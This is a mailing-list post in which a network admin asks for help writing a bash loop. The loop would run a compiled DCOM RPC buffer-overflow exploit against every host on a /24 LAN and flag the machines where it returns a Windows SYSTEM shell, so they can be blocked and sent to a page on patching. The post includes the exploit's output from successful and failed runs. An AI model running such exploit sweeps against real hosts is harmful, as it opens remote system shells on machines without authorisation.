Hello all.
I'm writing here, cause i think just here people can help me.
(p.s. didn't find bash mailing lists)
So here's what I'm palnning to do.. I have big LAN in here, and noticed that lots of
users are still exploitable using RPC.
I've just found source of this exploit, compiled it, and tried to use - it works.
What i'm planning to is automaticaly detect such users (exploitable).
So i run :
ftp# ./dc IP
and get:
-
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM hdm [at] metasploit.com
- Using return address of 0x77e626ba
- Dropping to System Shell...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32
END.
So if there is text like '- Dropping to System Shell...' means that system is
vulderable. otherways it teturns:
-
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM hdm [at] metasploit.com
- Using return address of 0x77e626ba
- Exploit appeared to have failed.
So what I wanna do is smth like:
for i in `seq 1 254`; do
./dc 192.168.1.$i
and if it returns 'Dropping to system shell' then add these IP to vulderable_users
done
After i'm planning to block those users on my router, and forward them to the webpage
with explanation on howto FIX that bug.
Thanks for help in advance
Jarek
___
[EMAIL PROTECTED] mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
